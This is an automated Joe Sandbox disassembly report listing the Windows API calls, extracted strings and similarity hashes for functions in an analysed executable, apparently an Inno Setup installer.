                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                          • String ID:
                                                                          • API String ID: 2671590913-0
                                                                          • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                          • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                          • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                          • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                          • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                          • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                          • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                          • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                          • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                          • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                          • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                          • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                          • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                          • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                          • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                          • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3304844376.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.3304826159.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3304861099.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3304844376.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.3304826159.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3304861099.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                          • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                          • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                          • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                          • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                          • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                          • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                          • API String ID: 4012871263-351310198
                                                                          • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                          • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                          • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                          • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                          • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                          • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                          • API String ID: 2323315520-3614243559
                                                                          • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                          • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                          • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                          • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                          • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                          • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                          • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                          • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                          • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                          • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                          • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                          • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                          • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                          • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                          • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                          • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                          • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                          • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                          • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                            • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                          • String ID:
                                                                          • API String ID: 2377543522-0
                                                                          • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                          • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                          • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                          • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                            • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                          • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                          • API String ID: 2000705611-3392794427
                                                                          • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                          • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                          • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                          • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                          • API String ID: 1452528299-3112430753
                                                                          • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                          • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                          • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                          • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 0045C2FA
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                            • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                          • API String ID: 59345061-4263478283
                                                                          • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                          • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                          • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                          • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                          APIs
                                                                          • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                          • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                          • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                          • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                          • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                          • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                          • String ID:
                                                                          • API String ID: 3135053572-0
                                                                          • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
